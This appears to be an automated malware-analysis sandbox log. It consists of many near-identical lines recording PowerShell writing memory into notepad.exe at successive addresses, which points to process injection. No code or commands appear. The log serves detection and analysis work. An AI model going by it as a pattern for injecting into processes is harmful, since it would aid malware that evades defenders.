              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0026Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0027Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0028Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0029Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC002AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC002BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC002CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC002DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC002EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC002FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0030Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0031Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0032Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0033Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0034Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0035Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0036Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0037Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0038Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0039Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC003AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC003BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC003CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC003DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC003EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC003FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0040Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0041Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0042Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0043Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0044Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0045Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0046Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0047Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0048Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0049Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC004AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC004BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC004CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC004DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC004EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC004FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0050Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0051Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0052Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0053Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0054Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0055Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0056Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0057Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0058Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0059Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC005AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC005BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC005CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC005DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC005EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC005FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0060Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0061Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0062Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0063Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0064Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0065Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0066Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0067Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0068Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0069Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC006AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC006BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC006CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC006DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC006EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC006FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0070Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0071Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0072Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0073Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0074Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0075Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0076Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0077Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0078Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0079Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC007AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC007BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC007CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC007DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC007EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC007FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0080Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0081Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0082Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0083Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0084Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0085Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0086Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0087Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0088Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0089Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC008AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC008BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC008CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC008DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC008EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC008FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0090Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0091Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0092Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0093Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0094Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0095Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0096Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0097Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0098Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0099Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC009AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC009BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC009CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC009DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC009EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC009FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00AAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00ABJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00ACJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00ADJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00AEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00AFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00BAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00BBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00BCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00BDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00BEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00BFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00CAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00CBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00CCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00CDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00CEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00CFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00DAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00DBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00DCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00DDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00DEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00DFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00EAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00EBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00ECJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00EDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00EEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00EFJump to behavior
